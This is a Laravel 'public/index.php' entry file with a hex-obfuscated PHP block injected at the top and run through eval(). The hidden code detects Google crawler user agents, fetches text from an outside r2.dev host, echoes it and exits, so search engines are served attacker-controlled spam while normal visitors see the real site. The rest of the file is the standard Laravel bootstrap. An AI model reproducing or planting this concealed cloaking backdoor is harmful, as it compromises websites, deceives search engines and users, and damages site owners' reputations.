<?php
$code = "\xd\xa\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x67\x6f\x6f\x67\x6c\x65\x28\x29\x20\x7b\xd\xa\x20\x20\x20\x20\x24\x61\x67\x65\x6e\x74\x73\x20\x3d\x20\x61\x72\x72\x61\x79\x28\x22\x47\x6f\x6f\x67\x6c\x65\x62\x6f\x74\x22\x2c\x20\x22\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x69\x74\x65\x2d\x56\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x22\x2c\x20\x22\x47\x6f\x6f\x67\x6c\x65\x2d\x49\x6e\x73\x70\x65\x63\x74\x69\x6f\x6e\x54\x6f\x6f\x6c\x22\x2c\x20\x22\x47\x6f\x6f\x67\x6c\x65\x62\x6f\x74\x2d\x4d\x6f\x62\x69\x6c\x65\x22\x2c\x20\x22\x47\x6f\x6f\x67\x6c\x65\x62\x6f\x74\x2d\x4e\x65\x77\x73\x22\x29\x3b\xd\xa\x20\x20\x20\x20\x66\x6f\x72\x65\x61\x63\x68\x20\x28\x24\x61\x67\x65\x6e\x74\x73\x20\x61\x73\x20\x24\x61\x67\x65\x6e\x74\x29\x20\x7b\xd\xa\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x28\x73\x74\x72\x70\x6f\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54\x27\x5d\x2c\x20\x24\x61\x67\x65\x6e\x74\x29\x20\x21\x3d\x3d\x20\x66\x61\x6c\x73\x65\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x74\x72\x75\x65\x3b\xd\xa\x20\x20\x20\x20\x7d\xd\xa\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x66\x61\x6c\x73\x65\x3b\xd\xa\x7d\xd\xa\xd\xa\x69\x66\x20\x28\x67\x6f\x6f\x67\x6c\x65\x28\x29\x29\x20\x7b\xd\xa\x20\x20\x20\x20\x24\x62\x6f\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x20\x3d\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x62\x2d\x38\x35\x39\x35\x34\x39\x38\x65\x36\x36\x30\x33\x34\x65\x62\x33\x61\x32\x30\x36\x37\x66\x31\x65\x65\x37\x37\x62\x64\x36\x33\x34\x2e\x72\x32\x2e\x64\x65\x76\x2f\x69\x62\x69\x7a\x61\x2e\x6c\x76\x6a\x65\x73\x2e\x74\x78\x74\x27\x3b\xd\xa\x20\x20\x20\x20\xd\xa\x20\x20\x20\x20\x24\x63\x75\x72\x6c\x20\x3d\x20\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74\x28\x29\x3b\xd\xa\xd\xa\x63\x75\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x5f\x61\x72\x72\x61\x79\x28\x24\x63\x75\x72\x6c\x2c\x20\x61\x72\x72\x61\x79\x28\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x55\x52\x4c\x20\x3d\x3e\x20\x24\x62\x6f\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x52\x45\x54\x55\x52\x4e\x54\x52\x41\x4e\x53\x46\x45\x52\x20\x3d\x3e\x20\x74\x72\x75\x65\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x45\x4e\x43\x4f\x44\x49\x4e\x47\x20\x3d\x3e\x20\x27\x27\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x4d\x41\x58\x52\x45\x44\x49\x52\x53\x20\x3d\x3e\x20\x31\x30\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54\x20\x3d\x3e\x20\x30\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x46\x4f\x4c\x4c\x4f\x57\x4c\x4f\x43\x41\x54\x49\x4f\x4e\x20\x3d\x3e\x20\x74\x72\x75\x65\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x48\x54\x54\x50\x5f\x56\x45\x52\x53\x49\x4f\x4e\x20\x3d\x3e\x20\x43\x55\x52\x4c\x5f\x48\x54\x54\x50\x5f\x56\x45\x52\x53\x49\x4f\x4e\x5f\x31\x5f\x31\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x43\x55\x53\x54\x4f\x4d\x52\x45\x51\x55\x45\x53\x54\x20\x3d\x3e\x20\x27\x47\x45\x54\x27\x2c\xd\xa\x20\x20\x43\x55\x52\x4c\x4f\x50\x54\x5f\x48\x54\x54\x50\x48\x45\x41\x44\x45\x52\x20\x3d\x3e\x20\x61\x72\x72\x61\x79\x28\xd\xa\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x47\x6f\x6f\x67\x6c\x65\x62\x6f\x74\x27\xd\xa\x20\x20\x29\x2c\xd\xa\x29\x29\x3b\xd\xa\xd\xa\x24\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x63\x75\x72\x6c\x5f\x65\x78\x65\x63\x28\x24\x63\x75\x72\x6c\x29\x3b\xd\xa\xd\xa\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73\x65\x28\x24\x63\x75\x72\x6c\x29\x3b\xd\xa\x65\x63\x68\x6f\x20\x24\x72\x65\x73\x70\x6f\x6e\x73\x65\x3b\xd\xa\xd\xa\x20\x20\x20\x20\x65\x78\x69\x74\x3b\xd\xa\x7d\xd\xa\x3f\x3e\xd\xa";
eval(str_replace('\\x', '%', urldecode($code)));
?>
<?php

use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Check If The Application Is Under Maintenance
|--------------------------------------------------------------------------
|
| If the application is in maintenance / demo mode via the "down" command
| we will load this file so that any pre-rendered content can be shown
| instead of starting the framework, which could cause an exception.
|
*/

if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
    require $maintenance;
}

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simply require it
| into the script here so we don't need to manually load our classes.
|
*/

require __DIR__.'/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/

$app = require_once __DIR__.'/../bootstrap/app.php';

$kernel = $app->make(Kernel::class);

$response = $kernel->handle(
    $request = Request::capture()
)->send();

$kernel->terminate($request, $response);
